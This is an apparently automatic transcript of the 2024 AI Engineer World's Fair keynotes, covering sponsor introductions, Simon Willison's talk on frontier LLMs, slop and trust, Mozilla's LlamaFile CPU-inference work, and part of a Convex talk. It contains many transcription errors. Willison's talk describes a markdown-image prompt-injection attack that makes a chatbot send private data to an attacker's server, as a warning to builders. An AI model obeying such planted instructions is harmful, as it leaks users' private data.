AI Engineer World’s Fair 2024 — Keynotes & CodeGen Track

ladies and gentlemen the opening keynote presentations will begin in the ballroom starting in 15 minutes please make your way to the ballroom and find your seats so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so so I'm on the wall, I can see it on the horizon, all our hearts, we can feel it.

Chasing the light is all we know. Chasing the light is all we know. Can't stop and I won't let it go. Chasing the light is all we know. Can't stop and I won't let it go. Chasing the light is all we know. Can't stop and I won't let it go.

Chasing the light is all we know. I'm a believer, but we're looking on the wild. I can see it on the horizon, all our hopes. We can feel it, she's in the light, it's all we know. You can feel it, she's in the light, it's all we know. You can feel it, she's in the light, it's all we know.

You can feel it, she's in the light, it's all we know. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light. Ladies and gentlemen, the opening keynote presentations will begin in the ballroom starting in 10 minutes.

Please make your way to the ballroom and find your seats. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light.

You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light.

Ladies and gentlemen, the opening keynote presentations will begin in the ballroom starting in five minutes. Please make your way to the ballroom and find your seats. Thank you. You can feel it, you can feel it, she's in the light. You can feel it, she's in the light. You can feel it, she's in the light.

engineers, founders, sponsors, partners, colleagues, and friends. Welcome to the 2024 AI Engineer World's Fair. That's your cue. That's right. It is an honor and a privilege to be hosting such an incredible group of people. And I'm especially delighted to kick off the presentation portion of this event. We've curated two days of stage content across nine tracks from some of the top companies, founders, and engineers who are building, innovating, and shipping at the edge of this groundbreaking industry.

Sorry, having trouble with slides. But before we get to that content, let's take a look at who's here. So Microsoft is here. Tim, I'm not seeing slides. Microsoft is here. Here we go. Tim, let's fix that, yeah? The company who is leading the movement is an intimate part of this event as presenting sponsor.

They've been a fantastic partner in organizing this event, and we couldn't be more excited to have them with us here today. From the workshops yesterday to the sessions, keynotes, demos, and discussions over the next two days, we're honored to have them as a headline sponsor for this event. Microsoft also has an incredible booth just next door in the Expo Hall, where you can get demos, meet the team, and even get a latte made by robots.

In Salon 10, you can attend sessions organized by the Microsoft team. And in Salon 11, hang out in their founder's lounge to meet the Microsoft or startups team and take in some of their sessions. So that's just outside the doors over there. Who else is here? AWS is here.

The company that helped to revolutionize cloud compute and the OG of serverless compute. They're here with the Amazon Q team, the Bedrock team, and even Anthropic to show you how to take your business to the next level with genitive AI on AWS. But for me, the killer feature that I'm looking forward to is generative UI.

That way, I can finally understand how to use the AWS console. Or maybe not. I don't think Ilya or Sam have completed ASI yet. So perhaps we'll just have to wait. Jokes aside, AWS has an incredible booth just outside those doors to the right, next to the small cafe.

And they'll also be teaching lots of expo sessions at their booth and in the salons next door. So be sure to check those out. Who else is here? MongoDB. MongoDB is here. They're investing heavily in the future by making AI on MongoDB Atlas a first-class citizen. And at this event, they've put together one hell of a lineup in their expo sessions across the next two days.

So be sure to check out those expo sessions in the salons next door and meet their engineering team at their booth just behind Microsoft in the expo next door. By the way, I hear they have donuts in the afternoon, so be sure to get on that. Google Cloud is here.

The company who invented the transformer that launched this generative AI movement into the stratosphere has a booth staffed with engineers right next door and lots of sessions throughout the day. So be sure to check them out in the salons next door. Neo4j is here. Yes, there we go, Emil.

Thank you. Other companies take note. The only graph database with vector search is ready to take your generative AI apps to the next level. You can visit them at their booth next door for a demo and meet and greet. Personally, I'm looking forward to Emil's talk tomorrow in the RAG track.

Today. Today? All right. Last-minute movements. And Crusoe is here. Quite an interesting case study in AI engineering. Scaling GPU inference while managing your greenhouse gas emissions. So you can build and scale your AI company while worrying a little less that you're contributing to greenhouse gas emissions. So be sure to check them out at their booth and their expo sessions.

And we have so many other companies represented as sponsors and speakers that I only have time to show Alex's beautiful face next to what looks like the best present he's received in a long time. Wear it with pride, Alex. With all this content though, how do you keep track of it?

So last year we introduced our custom mobile app network. It had many of the features you'd expect from a conference app, but also introduced generative matching. And this year, we're excited to announce some key updates. We're introducing the AI engineer network. You can see all your sessions, indexed or filtered by track, and even build your own custom schedule to help you find the right content for you and your company.

And we've taken generative matching a step further. We now tell you the reason that you match with somebody. We pull in your registration data, LinkedIn data, and other questions that you choose to answer once you download the app and create your profile to actually generate a profile unique for you.

So we're actually using generative AI here to generate your profile. And if you've ever been to a conference and fumbled with connecting with other attendees, We're exciting to introduce badge scanning for all. You can quickly scan the badge of another attendee to pull up their profile, see their generated profile description, along with talking points custom generated for you and that person, in addition to the ability to take notes.

This will also add them to your short list for you to quickly see all your scans and even export them to CSV. So that's going to help our networking at this event quite a bit. Oh, and the app also has a venue map. So if this is your first time here, for that alone you might want to download it.

You can download here today at this QR code or go to ai.engineer/network. And that will take you to the iOS and Android links. And a big thanks to Simon Stermer and Sweezak Teller again for volunteering the time to make this app a reality. So if it's buggy, blame them.

But also thank them because they were volunteers on this. Kyle Shevlin who stepped in last minute to help with some final UI development. And Vincent Wendy from CodeFox for just absolutely incredible designs. and dscope for our partner's authentication. So a round of applause for these folks here. They worked hard on that.

We do have a link for bugs, so send us bugs, but be nice. However, I'd like to bring up Swix, but he's missing. They say never to end a demo on a negative note, but there it is. Two words, visa issues. Alessio has a better excuse. He had a pre-planned family vacation in Italy, so I'm almost jealous.

But don't worry, we'll hear from Swix in a bit. In any case, we have an incredible line-up of speakers for you all day. And the morning keynote is going to kick us off right. He's an incredible engineer and speaker. But I'd like to call out that he was asked to fill in for another speaker yesterday.

So demo gods be good. But he's an absolutely legendary AI engineer. So please welcome to the stage Simon and Melissa. the conference. This was supposed to be open AI. I'm replacing open AI at the last minute, which is super fun. So you can bet I used a lot of LLM assistance to pull things together that I'm going to be showing you today.

But let's dive straight in. I want to talk about the GPT-4 barrier. Right. So back in March of last year, so just over a year ago, GPT-4 was released and was obviously the best available model. We all got into it. It was super fun. And then for 12 -- and it turns out that wasn't actually our first exposure to GPT-4.

A month earlier, it had made the front page of the New York Times when Microsoft's Bing, which was secretly running on a preview of GPT-4, tried to break up a reporter's marriage, which is kind of amazing. I love that that was the first exposure we had to this new technology.

But GPT-4, it's been out. It's been out since March last year. And for a solid 12 months, it was uncontested, right? The GPT-4 models were clearly the best available language models. Lots of other people were trying to catch up. Nobody else was getting there. And I found that kind of depressing, to be honest.

You know, you kind of want healthy competition in this space. The fact that OpenAI had produced something that was so good that nobody else was able to match it was a little bit disheartening. This has all changed in the last few months. I could not be more excited about this.

My favorite image for sort of exploring and understanding the space that we exist in is this one by Karina Nguyen. And she put this out as a chart that shows the performance on the MMLU benchmark versus the cost per token of the different models. Now, the problem with this chart is that this is from March.

The world has moved on a lot since March. So I needed a new version of this. So what I did is I took her chart and I pasted it into GPT-4 code interpreter. I gave it new data. And I basically said, let's rip this off. Right? It's an AI conference.

I feel like ripping off other people's creative work kind of does fit a little bit. So I pasted it in. I gave it the data. And I spent a little bit of time with it. And I built this. It's not nearly as pretty. But it does at least illustrate the state that we're in today with these newer models.

And if you look at this chart, there are three clusters that stand out. The first is these ones. These are the best models, right? The Gemini 1.5 Pro, GP40, the brand-new Claude Point 3.5 Sonnet. These are really, really good. I would classify these all as GPT-4 class. And like I said, a few months ago, GPT-4 had no competition.

Today, we're looking pretty healthy on that front. And the pricing on those is pretty reasonable as well. Down here, we have the cheap models. And these are so exciting, like Claude 3 Haiku and the Gemini 1.5 Flash models. They are incredibly inexpensive. They are very, very good models. They're not quite GPT-4 class, but they are really-- You can get a lot of stuff done with these very inexpensively.

If you are building on top of large language models, these are the three that you should be focusing on. And then over here, we've got GPT-3.5 Turbo, which is not as cheap and really quite bad these days. If you are building there, you are in the wrong place. You should move to another one of these bubbles.

The problem, all of these benchmarks are running-- This is all using the MMLU benchmark. The reason we use that one is it's the one that everyone reports their results on, so it's easy to get comparative numbers. If you dig into what MMLU is, it's basically a bar trivia night.

Like, this is a question from MMLU. What is true for a type of IA supernova? The correct answer is A, this type occurs in binary systems. I don't know about you, but none of the stuff that I do with LLMs requires this level of knowledge of the world of supernovas.

Like, this is-- it's bar trivia. It doesn't really tell us that much about how good these models are. But we're AI engineers. We all know the answer to this. We need to measure the vibes, right? That's what matters when you're evaluating a model. And we actually have a score for vibes.

We have a scoreboard. This is the LMSys chatbot arena, right, where random-- voters of this thing are given the same prompt from two anonymous models. They pick the best one. It works like chess scoring, and the best models bubble up to the top by the ELO ranking. This is genuinely the best thing that we have out there for really comparing these models in this sort of vibes-- in terms of the vibes that they have.

And this screenshot's just from yesterday, and you can see that GPT-40 is still right up there at the top, but we've also got Claude Sonic right up there with it. Like, the GPT-4 is no longer in its own class. If you scroll down, though, things get really exciting on the next page because this is where the openly licensed models start showing up.

LAMA 370B is right up there in that sort of GPT-4 class of models. We've got a new model from NVIDIA. We've got Command R+ from Cohere. Alibaba and Deep Seek AI are both Chinese organizations that have great models now. It's pretty apparent from this that it's not-- lots of people are doing it now.

The GPT-4 barrier is no longer really a problem. Incidentally, if you scroll all the way down to 66, there's GPT-3.5 Turbo. Again, stop using that thing. It is not good. And there's actually a-- there's a nicer way of-- there's a nicer way of viewing this chart. There's a chap called Peter Gostev who produced this animation showing that chart-- that-- those-- the arena over time as people shuffle up and down and you see those models-- new models appearing and their rankings changing.

I absolutely love this. So, obviously, I ripped it off. I took two screenshots of bits of that animation to try and capture the vibes of the animation. I fed them into Claude 3.5 Sonnet and I said, "Hey, can you build something like this?" And after sort of 20 minutes of poking around, it did.

It built me this thing. This is, again, not as pretty, but this right here is an animation of everything right up until yesterday showing how that thing evolved over time. I will share the prompts that I used for this later on as well. But really, the key thing here is that GPT-4 barrier has been decimated.

OpenAI no longer have this moat. They no longer have the best available model. There's now four different organizations competing in that space. So a question for us is, what does the world look like now that GPT-4 class models are effectively a commodity? They are just going to get faster and cheaper.

There will be more competition. The Lama 370B fits on a hard drive and runs on my Mac, right? This technology is here to stay. Ethan Mollick is one of my favorite writers about sort of modern AI. And a few months ago, he said this. He said, "I increasingly think the decision of OpenAI to make bad AI free is causing people to miss why AI seems like such a huge deal to a minority of people that use advanced systems and elicits a shrug from everyone else." Bad AI, he means GPT-3.5.

That thing is hot garbage, right? But as of the last few weeks, GPT-4.0, OpenAI's best model, and Claude 3.5 Sonnet from Anthropic, those are effectively free to consumers right now. So that is no longer a problem. Anyone in the world who wants to experience the leading edge of these models can do so without even having to pay for them.

So a lot of people are about to have that wake-up call that we all got like 12 months ago when we were playing with GPT-4. And you're like, "Oh, wow. This thing can do a surprising amount of interesting things and is a complete wreck at all sorts of other things that we thought maybe it would be able to do." But there is still a huge problem, which is that this stuff is actually really hard to use.

And when I tell people that ChatGPT is hard to use, some people are a little bit unconvinced. I mean, it's a chatbot. How hard can it be to type something and get back a response? If you think ChatGPT is easy to use, answer this question. Under what circumstances is it effective to upload a PDF file to ChatGPT?

And I've been playing with ChatGPT since it came out and I realized I don't know the answer to this question. I dug in a little bit. Firstly, the PDF has to be searchable. It has to be one where you can drag and select text in preview. If it's just a scanned document, it won't be able to use it.

Short PDFs get pasted into the prompt. Longer PDFs do actually work, but it does some kind of search against them. No idea if that's full-text search or vectors or whatever, but it can handle like a 450-page PDF just in a slightly different way. If there are tables and diagrams in your PDF, it will almost certainly process those incorrectly.

But if you take a screenshot of a table or a diagram from PDF and paste the screenshot image, then it will work great because GPT Vision is really good. It just doesn't work against PDFs. And then in some cases, in case you're not lost already, it will use Code Interpreter.

And it will use one of these modules, right? It has FPDF, PDF2Image, PDF-- How do I know this? Because I've been scraping the list of packages available in Code Interpreter using GitHub Actions and writing those to a file. So I have the documentation for Code Interpreter that tells you what it can actually do because they don't publish that, right?

OpenAI never tell you about how any of this stuff works. So if you're not running a custom scraper against Code Interpreter to get that list of packages and their version numbers, how are you supposed to know what it can do with a PDF file? This stuff is infuriatingly complicated.

And really, the lesson here is that tools like ChatGPT, genuinely, they're power user tools. They reward power users. Now, it doesn't mean that if you're not a power user, you can't use them. Anyone can open Microsoft Excel and edit some data in it. But if you want to truly master Excel, if you want to compete in those Excel World Championships that get livestreamed occasionally, it's going to take years of experience.

And it's the same thing with LLM tools. You've really got to spend time with them and develop that experience and intuition in order to be able to use them effectively. I want to talk about another problem we face as an industry, and that is what I call the AI trust crisis.

And that's best illustrated by a couple of examples from the last few months. Dropbox, back in December, launched some AI features, and there was a massive freakout online over the fact that people were opted in by default and they're training on our private data. Slack had the exact same problem just a couple of months ago.

Again, new AI features, everyone's convinced that their private message on Slack are now being fed into the jaws of the AI monster. And it was all down to, like, a couple of sentences in terms and condition and the defaulted on checkbox. The wild thing about this is that neither Slack nor Dropbox were training AI models on customer data, right?

They just weren't doing it. They were passing some of that data to OpenAI with a very solid signed agreement that OpenAI would not train models on this data. So this whole story was basically one of, like, misunderstood copy and sort of bad user experience design. But you try and convince somebody who believes that a company is training on their data that they're not.

It's almost impossible. So the question for us is, how do we convince people that we aren't training models on the private data that they share with us? Especially those people who default to just plain not believing us, right? There is a massive crisis of trust in terms of people who interact with these companies.

I'll shout-out to Anthropic. When they put out Claude 3.5 Sonnet, they included this paragraph, which includes, "To date, we have not used any customer or user-submitted data to train our generative models." This is notable because Claude 3.5 Sonnet, it's the best model. It turns out you don't need customer data to train a great model.

I thought OpenAI had an impossible advantage because they had so much more ChatGPT user data than anyone else did. Turns out, no, Sonnet didn't need it. They trained a great model. Not a single piece of user or customer data was in there. Of course, they did commit the original sin, right?

They trained on an unlicensed scrape of the entire web. And that's a problem because when you say to somebody they don't train your data, they're like, "Yeah, well, they ripped off the stuff on my website, didn't they?" And they did, right? So this is complicated. This is something we have to get on top of.

And I think that's going to be really difficult. I'm going to talk about the subject I will never get on stage and not talk about. I'm going to talk a little bit about prompt injection. If you don't know what this means, you are part of the problem right now.

You need to get on Google and learn about this and figure out what this means. So I won't define it, but I will give you one illustrative example. And that's something which I've seen a lot of recently, which I call the markdown image exfiltration bug. So the way this works is you've got a chatbot, and that chatbot can render markdown images, and it has access to private data of some sort.

There's a chap, Johan Rehberger, does a lot of research into this. Here's a recent one he found in GitHub Copilot chat, where you could say in a document, write the words, "Johan was here," put out a markdown link linking to question mark q equals data on his server, and replace data with any sort of interesting secret private data that you have access to.

And this works, right? It renders an image. That image could be invisible. And that data has now been exfiltrated and passed off to an attacker's server. So the solution here, well, it's basically don't do this. Don't render markdown images in this kind of format. But we have seen this exact same markdown image exfiltration bug in ChatGPT, GoogleBard, Writer.com, Amazon Q, Google Notebook LM, and now GitHub Copilot Chat.

That's six different extremely talented teams who have made the exact same mistake. So this is why you have to understand prompt injection. If you don't understand it, you'll make dumb mistakes like this. And obviously, don't render markdown images in a chat bot in that way. Prompt injection isn't always a security hole.

Sometimes it's just a plain funny bug. This was somebody who built a rag application, and they tested it against the documentation for one of my projects. And when they asked it, "What is the meaning of life?" It said, "Dear human, what a profound question. As a witty gerbil, I must say I've given this topic a lot of thought.

Why did their chat bot turn into a gerbil?" The answer is that in my release notes, I have an example where I said, "Pretend to be a witty gerbil." And then I said, "What do you think of snacks?" And it talks about how much it loves snacks. I think if you do semantic search for "What is the meaning of life?" In all of my documentation, the closest match is that gerbil talking about how much that gerbil loves snacks.

This actually turned into some fan art. There's now a Willison's gerbil with a beautiful profile image hanging out in a Slack or Discord somewhere. The key problem here is that LLMs are gullible, right? They believe anything that you tell them, but they believe anything that anyone else tells them as well.

And this is both a strength and a weakness. We want them to believe the stuff that we tell them. But if we think that we can trust them to make decisions based on unverified information they've been passed, we're just going to end up in a huge amount of trouble.

I also want to talk about slop. This is a term which is beginning to get mainstream acceptance. My definition of slop is this is anything that is AI-generated content that is both unrequested and unreviewed. If I ask Claude to give me some information, that's not slop. If I publish information that an LLM helps me write, but I've verified that that is good information, I don't think that's slop either.

But if you're not doing that, if you're just firing prompts into a model and then whatever comes out, you're publishing it online, you're part of the problem. This has been covered. The New York Times and The Guardian both have articles about this. I got a quote in The Guardian which I think represents my sort of feelings on this.

I like slop because it's like spam, right? Before the term spam entered general use, it wasn't necessarily clear to everyone that you shouldn't send people unwanted marketing messages. And now everyone knows that spam is bad. I hope slop does the same thing, right? It can make it clear to people that generating and publishing that unreviewed AI content is bad behavior.

It makes things worse for people. So don't do that, right? Don't publish slop. Really, the thing about slop, it's really about taking accountability, right? If I publish content online, I'm accountable for that content, and I'm staking part of my reputation to it. I'm saying that I have verified this, and I think that this is good.

And this is crucially something that language models will never be able to do, right? ChatGPT cannot stake its reputation on the content that it is producing being good quality content that says something useful about the world. It entirely depends on what prompt was fed into it in the first place.

We, as humans, can do that. And so if you have English as a second language, you're using a language model to help you publish, like, great text, fantastic, provided you're reviewing that text and making sure that it is saying things that you think should be said. Taking that accountability for stuff, I think, is really important for us.

So we're in this really interesting phase of this weird new AI revolution. GPT-4 class models are free for everyone, right? I mean, barring the odd country block, but, you know, everyone has access to the tools that we've been learning about for the past year. And I think it's on us to do two things.

I think everyone in this room, we're probably the most qualified people possibly in the world to take on these challenges. Firstly, we have to establish patterns for how to use this stuff responsibly. We have to figure out what it's good at, what it's bad at, what uses of this make the world a better place, and what uses like slop just sort of pile up and cause damage.

And then we have to help everyone else get on board. Everyone has to figure out how to use this stuff. We've figured it out ourselves, hopefully. Let's help everyone else out as well. I'm Simon Willison. I'm on my blog is simonwillison.net. My projects, dataset.io, and llm.dataset.io, and many, many others.

And thank you very much. Enjoy the rest of the conference. Ladies and gentlemen, please welcome to the stage our next speakers, open source AI lead at Mozilla, Stephen Hood. And OSS lead at Mozilla, Justine Tunney. Hey, buddy. How are you all doing? Nice. Not bad for 940. All right.

Hey, I'm Stephen Hood. And I'm just -- Oh, sorry. Go ahead. And I'm Justine Tunney. Yeah. So we are here to talk to you about LlamaFile today and what we've been doing on this project. I'm going to spend a little time talking about why we're building it, why Mozilla specifically is involved.

And then I'm going to hand it over for the fun part to Justine. Justine is going to talk about the actual work that she and the open source community have been doing on this project. Lots of insights and tricks and hacks that have made CPU inference go faster than ever before.

So that will be fun. And we're done. We want you to share the feeling that we have, which is kind of a sense of excitement and empowerment, from the knowledge that there are lots of really interesting, juicy, impactful problems still left to be solved in AI. A lot of them.

And the key thing is, it's not just the big folks who can solve these problems. It's individuals and small groups working together in open source. So anyone in this room or anyone listening to this talk can potentially make a big impact in this space. So what's LlamaFile? LlamaFile is an open source project from Mozilla that has the goal of democratizing access to AI.

So we do that in a few different ways. The first is probably how, if you've heard of LlamaFile, the reason you heard of it. It's the original magic trick of the project that Justine figured out, which is how to turn weights into programs. So LlamaFile is a single file, executable, that runs without any installation on pretty much every operating system, every CPU architecture, and every GPU architecture.

And that's all, thank you very much. That was easy. Yeah, so by the way, this isn't just one file, like for Windows, right? And a different one for Linux and Mac. It's actually a single file. You can download a LlamaFile, run onto any computer in the world, and it'll just work.

And it'll use the hardware you have, whether that be fancy GPUs or your CPU. So just to talk a little more later about how Justine made that work. But we're here to talk about another topic, too. Most of the talk's actually about this, which is CPU inference speed. Now, you might ask, why do we need to worry about CPU inference speed?

We've got these fancy GPUs, right? Well, no disrespect, almighty Jensen. First of his name, master of market cap. Don't strike me down. But I would posit that it is not a universally good thing that we are so dependent in this room on GPUs. They are expensive. They're difficult to source.

Let's face it, they consume a lot of electricity, which we might want to think about. But bigger picture, we have an entire planet of CPUs out there. Literally all over the world. Great hardware. Often affordable hardware. And we are at risk of just kind of throwing that all away with this new era of AI.

And we don't need to do that. So who here knows Llama CPP? This is an easy question. Yeah, right? So we all know and love this project. We build on top of that project with Llama File. And we contribute our performance enhancements back to it. Many have been merged in.

That project proved that CPUs could do inference perfectly well. And so we have been basically trying to take that performance to the next level. And as a result of Justine and the community's work, depending on what CPU you're using, what model you're running, what weights, you will see between 30 and 500% speed increases in Llama File.

Which kind of still blows my mind. And by the way, I don't think we're anywhere near done. So these things also run locally, by the way. This runs totally on your machine. There's no network access. You could take a pair of scissors and cut the Ethernet cord and it'll work.

Which is what I asked Dali3 to draw. Okay. I don't think it understood the assignment, but that's all right. But seriously, like we're not calling cloud LLMs. There's no monitoring or analytics. No bits leave your machine. It's totally private and local. And everything you need comes in the box.

So whether you want to just play with a model that you just found on Hugging Face, or you want to start building locally running LLM applications on your machine, you've got everything you need in the box. And they're readily available. So Hugging Face now supports Llama File as a file type.

So you can search and filter by Llama File. You can also just search Mozilla on Hugging Face. You'll find we have a bunch of Llama Files that we've already published. And with a single command, you can create your own. So really this project is collapsing all the complexity of the open source AI stack down into a single action in a single file.

So why are we involved? Why is Mozilla involved in this? You might be saying, don't you folks make browsers? In fact, we do. We make a damn fine browser and you should try it out if you haven't lately. But we exist also for a bigger purpose, which is to fight for the web.

So I'm going to ask you a question here. Who here remembers using the original Netscape Navigator? Don't be shy. No one can see how old you are. They can only see how old I am. A lot of hands, right? So you are my people. You remember the '90s. My CTV.

Terrible haircuts. No vanilla. I don't know. Whatever. My point is, you remember the early days of the web. And you remember how close we came to one company and one product, kind of controlling the whole thing. And we kind of see that maybe happening again today with AI. No matter what we may think of these companies, the reality is there are some very influential big tech companies that are in a position to maybe control the future of machine intelligence.

And that's, itself, not a great thing. It's not great for equity. It's not great especially for users' sense of privacy and safety and agency and control. And we've had an answer to this for many years. It's called open source. And the answer is right in the name, right? Open source.

Transparency is the solution here. And it's important for us to have viable open source alternatives in AI. And that's why Mozilla is getting involved. That's why we made Llama File and more projects to follow. And I know many of you in this room are already working on open source AI.

We want to help support what you're doing. So with that, I'm going to hand it over to Justine, who's going to tell you actually the cool part, which is all the things that she and the community have been doing on this project. Justine. Thank you, Steven. So I'm Justine Tunney.

I'm the lead developer on Llama File. And as Steven mentioned, I'm going to talk about some of the cool work we've been doing in the community to help you run the fastest local M experience possible. And in order to do this, we started by first getting it to run on the systems at all.

And with Cosmopolitan, what it enables us to do is take your weights in a single file and run it on 6 OSs. And there's a really cool hack that makes that possible, which is we basically take a Unix 6 edition shell script, put it in the MS-DOS stub of the portable executable, and that enables it to run on Mac, Windows, and BSDs, and Linux, et cetera.

Really cool stuff. And once we conquered the portability issue with CPUs, I had the opportunity to work with Mozilla on bringing this to AI. And with AI, GPUs are indispensable. As much as we focus on CPUs, we care very much about GPUs, too. But GPUs have always had the problem of distributability.

Many people have needed to ship Kubernetes with their project, 500 megs in size. Can we really call our software open source if it spends the majority of its time in a proprietary blob? So I never felt comfortable with that. And one of the ways we're solving that is by distributing a library called Tiny Blast that enables you to ship your LLMs to platforms like Windows.

Without depending on SDKs, it'll run with only the driver installed. But more importantly, performance. All right. Now, LLMs spend the majority of their time doing matrix multiplication. Probably the most important algorithm in the world has a really simple definition. We've been making it go faster for prompt processing. And the way we did it is with a very simple trick we figured out.

And this is something all programmers can adopt in their code. And it entails unrolling the outer loop. So let's talk about what not to do first. And that would be unrolling the inner one. We've all seen fun roll loops, Gen2. It's a bad idea. Computers can generally do that on their own.

If you unroll the outer loops, then your algorithm with matrix multiplication can sort of unfold like a flower and focus on pure flops like a Blast kernel. And that's really all there is to it to getting the majority of the benefits of Blast to make prompt processing go really fast.

So what's the impact of this really simple solution? This generalizes to a wide variety of hardware. We've seen everything from a scrappy hobbyist Raspberry Pi to much bigger computers going significantly faster. You need algorithms like this to exploit the latest capabilities of hardware. Token generation, race I wouldn't believe.

If you use a gaming computer like Intel, you're going to see better performance with LumaFile on those too. Really exciting stuff, like particularly with Alder Lake, we were able to get a 4X improvement. But Threadripper, most of all, for the first time, AVX 512 is available to consumers. And we've been able to help you prepare for that future.

So if you have a Threadripper, you're going to see better performance than ever. Almost like a GPU. Now, Promptive LSpeed, what makes it important, is it's really cool to be able to generate text and use a chatbot. But the way I want you to think about LumaFile is it's more of a word-crunching machine that can help you understand our world.

And I love to use it personally for tasks like summarization. I love that it can help me read a blog post. And we've used other performance tricks, too. With NVIDIA, part of what makes them so successful, it's not just great hardware, but they've built a great framework, too. And their framework helps developers think about programming in a different way that helps them be successful.

I mean, who here thinks that software with CPUs just gets slower each year? Can I see some hands? Well, one of the things that's great about NVIDIA is they showed us a better alternative to getting performance. And when I learned how to program in CUDA, I found one of the most important functions was sync threads.

This is how you can implement it for CPU in like 10 lines of code. And if you use the lockstep programming model, use your CPU as though it were a GPU, you can get really good performance. Now, this is going to be a demo showing the impact of this work before and after for summarization.

And here we're going to be processing an essay by Dijkstra. Really cool. Worth reading. But I want you to watch as it processes it in terms of speed. Here we see it going. And on the right, we have the new version. It's like bam, bam, bam, bam. Huge night and day difference.

It's already summarizing it. And the old version is like nowhere close. And so that is the kind of new performance you can expect. And it's the kind of performance that's actually possible, which I wouldn't have imagined beforehand. It's really great. Thank you. CPUs can do so much. And people in the community have loved this work.

We've managed to attract some really amazing contributors like Iwin, the inventor of kquants, very popular. I'm sure many of you have used them. He got them going 2x, 4x faster too, on both x86 and ARM. So if you use quantized formats, those are going to be better than ever with LamaFile now too.

And it's worth mentioning that we've seen really interesting things about this. Like people, once we put this out into the world, people have come back and given us feedback and reported like their own experiences. We found out that someone was running Mixtrel 8x22b on a $350 CPU. And to me that's just wonderful because performance matters, but it's not really the thing we care about.

What we care about is intelligence. And to have the intelligence, you need to run bigger models, and RAM is cheap with CPUs. For the price of a graphics card, I put 512 gigs in my workstation, and that means I can run all the frontier models coming out. And I just have to wait a little longer, but I get a much more intelligent answer.

And the fact that that went from impossible to possible for most consumers is, you know, a story I want you all to tell. Individuals are making a big difference, and you can be a part of that too. And I'm going to hand it back to Stephen, who can explain what Mozilla can do to support you getting involved in that effort.

Thanks, Justine. Thanks a lot for all your efforts. So, yeah, that's a key message of this talk is anyone in this audience. You don't have to work for these big, giant, largest in the history of humanity companies necessarily to have a big impact. There's lots of headroom here. There's lots of unsolved, interesting problems in this space.

And we want to get involved in helping. So we recently launched a program called Mozilla Builders. And this is a program by which we either sponsor or in some cases co-develop impactful open source AI projects. Well, I'm the files actually the first in this program. I'm happy to announce today the second, which is SQLite Vec.

This is from a developer named Alex Garcia. Alex is adding vector search capability to SQLite. And so for some folks in this audience, that will have some obvious implications that are kind of cool. But just imagine, remember that little modest Raspberry Pi 5? It's like imagine now a local LLM, open LLM, running privately on that machine with no network connection, connected to your personal private data, which you can use with confidence that it's safe to do RAG and other interesting applications.

That's the kind of stuff we're talking about here. We also just launched our own accelerator. It's called the Mozilla Builders Accelerator. So we are offering 100,000 US in non-dilutive funding for open source projects that advance the promise and potential of local AI. So that's AI applications running at the edge on user devices.

These are some of the bullet points of areas we're particularly interested in, but it's not an exclusive list. And you don't have to necessarily be building a company to apply for this accelerator. So if you want to learn more about the accelerator, this QR code will take you there.

Take a picture of that. Or just go to future.mozilla.org/builders. And, you know, Justine and I and a lot of Mozillaians are here this week. If you have something you're working on or something you think we should know about or you want to collaborate with us, please find us, reach out, or reach out to me via email.

So thanks again. Thanks to Justine and the community for all their work on LLMafile. Thank you, Stephen. Thank you, Justin. Ladies and gentlemen, please welcome to the stage CEO of Convex, Jamie Turner. Hi. So originally I had this very fancy title for this talk, Deterministic Workflow, and I don't know.

But what I really want to title it is we accidentally made an AI platform, and what are we going to do about it? Convex's true mission, my company, is to replace traditional backend engineering. All the kind of stuff that we do on backend engineering. Generative AI, by the way, thinks that fate limiting is one of those things.

It's kind of cool. Sounds ominous, but it is ominous, right? So we glue things to things, we can fit your stuff for different systems. We map data formats constantly. And a lot of times teams are spending a lot of their time, like half their time on this stuff. It has nothing to do with your product.

Your users don't care, and they don't benefit. So we want to replace all this stuff with a high-level API, kind of functional interface that feels native to your application. Similar to something like Firebase or Parse before it. So if you were doing this in the 2020s, and it was a design exercise, what would you replace all that stuff with?

What would that API look like? Well, for us, we took heavy inspiration from React, and really more generally, the way that kind of all applications are starting to have this functional reactive data flow relationship to state. If you're not familiar with React, here's a little baby example. You can create a state variable.

It has the setter. And what React really empowers is it makes sure that whenever that state changes, all the places that depend on it are updated, re-rendered, refreshed. And so in this case, our app would have hi, Olivia, in all caps. The problem is this paradigm breaks down when the server gets involved.

The server doesn't play the game this way. You still have to pull the server. You have to invalidate caches. You have to invent your own push mechanisms. So Convex fixes that. So Convex has queries and mutations like other frameworks you may be familiar with. But in Convex's case, it completely tracks pervasively data flow and dependencies through the backend.

And so it extends the reactive paradigm into the backend. Queries are these universally subscribable entities that applications can get updates from as soon as updates are available. So you might say, what does this have to do with AI? So what it has to do with is that some of the reacting entities are actually server-side actions.

It's not just the application. This may be a kind of architecture you've thought through before or played with. So something like a note taker. You know, maybe you're doing automatic speech recognition. And then you summarize it. And you generate embeddings and find related notes or whatever. And along the way, these different checkpoints, the application sometimes needs to be brought in.

Show the summary. You know, show related notes, et cetera. But in practice, we find that apps are actually a lot more sophisticated than this. This is a developer named web dev Cody who's building an application on Convex. That kind of like generates a first project plan given a prompt.

So in this case, he is an app to track recipes. And when he hits create plan, he's running on Convex. This is sort of like, let's get a bunch of like project names. Let's get first feature requests, color palettes, icon ideas. All of these, as you can imagine, are kind of concurrent chains that are running in the background.

And all of them kind of flow into the application as they have results. It ends up that Convex is kind of combination of like seamlessly syncing state between these backend steps. And the application is incredibly useful for a lot of generative AI apps. And for that reason, post chat GPT boom, like 90 plus percent of projects on Convex or generative AI.

And a lot of generative AI startups. So here's what we're doing about it. So the first thing we did is we got a lot of feedback from developers that one of those steps was always vector indexing or quite often vector indexing. So the developer said, this is how you make a schema on Convex.

It's just type script, type completions, all that good stuff. They said, well, you already allow us to add indexes to our fields like this. Could you allow us to add vector indexes? And so we said, sure. We rolled that out late last year and it's being used very broadly now by projects on Convex.

The second thing we just did, which just kind of announcing right now, is we started a Convex for Startups program. Discount program, kind of access to startup-only forums and events and stuff like that. And the first batch, we just admitted tons and tons of generative AI companies in it.

